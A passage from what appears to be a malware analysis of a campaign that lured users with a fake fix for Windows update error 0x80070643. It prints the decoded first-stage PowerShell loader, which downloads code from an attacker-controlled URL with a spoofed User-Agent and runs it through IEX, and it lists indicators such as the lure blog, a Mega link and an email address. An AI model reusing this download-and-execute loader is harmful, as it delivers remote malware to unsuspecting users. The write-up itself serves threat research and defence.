Invoke - ObfuscatedCode;
|
However, at the time of discovery, Stage 2 was no longer available as the site had already been blocked by CloudFlare.
Another upload (2024-05-14 by @OnTrendd) linked in the description to an similar named blog page (ontrendyt[.]com/2024/05/how-to-fix-0x80070643-while-updating.html), offering a solution via a downloadable PowerShell script through a Mega.nz download link (mega[.]nz/file/PzgVHKYK#R77mTJQKpJR3KiX2X6Nn_zY7oXOIdcUoBbgEatYproc). This script follows a similar structure to the known Stage 1 but differs significantly in the Base64 encoded payload.
0
1
2
3
4
5
6
7
| $g91F = 'https://rtattack.baqebei1.online/KB/CODD'
$v38K = @ {
'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'
}
$z04Q = Invoke - WebRequest - Uri $g91F - UseBasicParsing - Headers $v38K
IEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))
clear - host;
|
Additionally, at the time of discovery, Stage 2 was no longer available as the site had already been blocked by CloudFlare, but this one has an email address attached to it: rajatayyabmehmood003[@]gmail.com